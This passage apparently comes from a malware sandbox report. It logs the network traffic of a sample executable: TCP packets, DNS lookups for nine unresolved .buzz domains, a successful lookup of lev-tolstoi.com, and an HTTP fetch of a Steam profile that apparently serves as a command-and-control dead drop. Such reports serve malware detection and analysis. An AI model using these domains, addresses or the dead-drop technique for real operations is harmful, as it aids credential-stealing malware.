                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:36.813222885 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:36.813499928 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:36.814661980 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:36.814704895 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:36.814932108 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:36.816278934 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:36.816320896 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:36.816364050 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.565221071 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.565284967 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.565319061 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.565351963 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.565382004 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.565423012 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.565452099 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.570622921 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.575335979 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.575426102 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.578398943 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.579480886 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.586373091 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.629821062 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.629837990 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.676711082 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.684814930 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.739216089 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.739263058 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.766222000 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.766304970 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.766362906 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.769834995 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.769892931 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.770009041 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.770051956 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.770078897 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:37.770092964 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:38.064630985 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:38.064683914 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:38.064774036 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:38.065063000 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:38.065074921 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.370286942 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.370364904 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.371684074 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.371694088 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.372014046 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.373384953 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.373542070 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.373590946 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.373696089 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:39.373702049 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.452155113 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.452251911 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.452305079 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.452439070 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.452455997 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.531162024 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.531243086 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.531327009 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.531630039 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:40.531646013 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:41.837044001 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:41.837133884 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:41.840557098 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:41.840599060 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:41.840847015 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:41.845596075 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:41.845762014 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:41.845802069 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.778984070 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.779072046 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.779196024 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.779321909 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.779355049 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.975387096 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.975457907 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.975537062 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.975919962 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:42.975941896 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.232434988 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.232527018 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.234133005 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.234149933 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.234389067 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.235667944 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.236047029 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.236079931 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.239325047 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:44.239334106 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.418817043 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.418916941 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.418963909 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.419166088 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.419193983 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.909395933 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.909455061 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.909548998 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.909913063 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:45.909921885 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:47.134581089 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:47.134711027 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:47.548006058 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:47.548048019 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:47.548374891 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:47.550566912 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:47.550662994 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:47.550668955 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.048661947 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.048754930 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.048820019 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.048995972 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.049026012 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.541002989 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.541065931 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.541145086 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.541433096 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:49.541450024 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.846153975 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.846282959 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.847534895 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.847580910 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.848139048 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.881489992 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.882261038 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.882312059 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.882467031 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.882512093 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.882648945 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.882684946 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.883380890 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.883439064 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.883743048 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.883800983 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.883996010 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.884042025 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.884062052 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.884092093 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.884193897 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.884231091 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.884278059 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.887170076 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.887240887 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.927342892 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.927558899 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.927633047 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.927687883 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.975332022 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:50.975547075 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:51.023330927 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.845639944 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.845767021 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.845851898 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.846039057 CET49742443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.846060991 CET44349742104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.893743038 CET49745443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.893798113 CET44349745104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.893901110 CET49745443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.894224882 CET49745443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:56.894241095 CET44349745104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:57.286230087 CET49745443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.314346075 CET5113053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.457808971 CET53511301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.467544079 CET5551353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.607738018 CET53555131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.612976074 CET5793753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.754645109 CET53579371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.756412029 CET5896853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.895736933 CET53589681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.897339106 CET5091553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.036433935 CET53509151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.038080931 CET5219853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.178272963 CET53521981.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.214797020 CET5121653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.353864908 CET53512161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.368041992 CET6266053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.511451006 CET53626601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.551717997 CET5697553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.691616058 CET53569751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.693254948 CET5755653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.833120108 CET53575561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.410612106 CET5010953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.554575920 CET53501091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.314346075 CET192.168.2.41.1.1.10x533eStandard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.467544079 CET192.168.2.41.1.1.10x9cc2Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.612976074 CET192.168.2.41.1.1.10x8589Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.756412029 CET192.168.2.41.1.1.10x13e6Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.897339106 CET192.168.2.41.1.1.10x462fStandard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.038080931 CET192.168.2.41.1.1.10x7802Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.214797020 CET192.168.2.41.1.1.10x3e2Standard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.368041992 CET192.168.2.41.1.1.10xc54Standard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.551717997 CET192.168.2.41.1.1.10x882aStandard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.693254948 CET192.168.2.41.1.1.10xe043Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.410612106 CET192.168.2.41.1.1.10x8b18Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.457808971 CET1.1.1.1192.168.2.40x533eName error (3)mindhandru.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.607738018 CET1.1.1.1192.168.2.40x9cc2Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.754645109 CET1.1.1.1192.168.2.40x8589Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:29.895736933 CET1.1.1.1192.168.2.40x13e6Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.036433935 CET1.1.1.1192.168.2.40x462fName error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.178272963 CET1.1.1.1192.168.2.40x7802Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.353864908 CET1.1.1.1192.168.2.40x3e2Name error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.511451006 CET1.1.1.1192.168.2.40xc54Name error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.691616058 CET1.1.1.1192.168.2.40x882aName error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.833120108 CET1.1.1.1192.168.2.40xe043No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.554575920 CET1.1.1.1192.168.2.40x8b18No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.554575920 CET1.1.1.1192.168.2.40x8b18No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                                    • lev-tolstoi.com
                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.44973123.55.153.1064437292C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-28 09:07:32 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                                    2024-12-28 09:07:32 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:07:32 GMT
                                                                                                                                                                                                                                                    Content-Length: 35121
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: sessionid=88434832a89f9e94d513ab5d; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                    2024-12-28 09:07:32 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
